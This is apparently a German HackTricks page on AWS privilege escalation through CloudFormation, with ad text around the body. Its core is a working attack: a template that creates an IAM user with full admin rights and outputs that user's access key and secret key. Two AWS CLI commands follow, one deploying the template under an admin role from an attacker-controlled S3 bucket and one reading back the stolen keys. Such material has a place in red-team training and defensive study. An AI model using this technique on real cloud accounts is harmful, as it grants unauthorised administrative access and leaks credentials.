Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert) ! Andere Möglichkeiten, HackTricks zu unterstützen:
Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten , überprüfen Sie die ABONNEMENTPLÄNE !
Copy {
"Resources" : {
"AdminUser" : {
"Type" : "AWS::IAM::User"
} ,
"AdminPolicy" : {
"Type" : "AWS::IAM::ManagedPolicy" ,
"Properties" : {
"Description" : "This policy allows all actions on all resources." ,
"PolicyDocument" : {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Action" : [
"*"
] ,
"Resource" : "*"
}]
} ,
"Users" : [{
"Ref" : "AdminUser"
}]
}
} ,
"MyUserKeys" : {
"Type" : "AWS::IAM::AccessKey" ,
"Properties" : {
"UserName" : {
"Ref" : "AdminUser"
}
}
}
} ,
"Outputs" : {
"AccessKey" : {
"Value" : {
"Ref" : "MyUserKeys"
} ,
"Description" : "Access Key ID of Admin User"
} ,
"SecretKey" : {
"Value" : {
"Fn::GetAtt" : [
"MyUserKeys" ,
"SecretAccessKey"
]
} ,
"Description" : "Secret Key of Admin User"
}
}
}
Copy aws cloudformation create-stack --stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::[REDACTED]:role/adminaccess \
--capabilities CAPABILITY_IAM --region us-west-2
Copy aws cloudformation describe-stacks \
--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
--region uswest-2
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert) ! Andere Möglichkeiten, HackTricks zu unterstützen:
Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten , überprüfen Sie die ABONNEMENTPLÄNE !